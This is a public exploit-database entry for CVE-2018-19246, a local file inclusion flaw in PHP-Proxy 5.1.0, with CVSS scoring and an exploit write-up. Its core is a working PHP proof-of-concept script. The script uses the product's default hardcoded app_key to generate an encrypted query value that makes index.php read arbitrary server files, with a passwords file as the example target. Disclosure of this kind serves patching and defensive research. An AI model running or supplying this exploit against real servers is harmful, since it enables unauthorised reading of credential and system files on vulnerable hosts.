PHP-Proxy 5.1.0 Local File Inclusion

2018.11.16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion # Date: 2018-11-13 # Exploit Author: Ameer Pornillos # Contact: https://ethicalhackers.club # Vendor Homepage: https://www.php-proxy.com/ # Software Link: https://www.php-proxy.com/download/php-proxy.zip # Version: 5.1.0 # Category: Webapps # Tested on: XAMPP on Win10_x64 # Description: Downloadable pre-installed version of PHP-Proxy 5.1.0 # make use of a default app_key wherein can be used for local file inclusion # attacks. This can be used to generate encrypted string which # can gain access to arbitrary local files in the server. # http://php-proxy-site/index.php?q=[encrypted_string_value] # CVE: CVE-2018-19246 # POC: # 1) # Generate encrypted string value using the PHP script below # 2) # Browse to URL # http://php-proxy-site/index.php?q=[encrypted_string_value] # to read local file <?php $file = "file:///C:/xampp/passwords.txt"; //example target file to read $ip = "192.168.0.1"; //change depending on your IP address that access the app $app_key = "aeb067ca0aa9a3193dce3a7264c90187"; $key = md5($app_key.$ip); function str_rot_pass($str, $key, $decrypt = false){ $key_len = strlen($key); $result = str_repeat(' ', strlen($str)); for($i=0; $i<strlen($str); $i++){ if($decrypt){ $ascii = ord($str[$i]) - ord($key[$i % $key_len]); } else { $ascii = ord($str[$i]) + ord($key[$i % $key_len]); } $result[$i] = chr($ascii); } return $result; } function base64_url_encode($input){ return rtrim(strtr(base64_encode($input), '+/', '-_'), '='); } echo base64_url_encode(str_rot_pass($file, $key)); ?>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top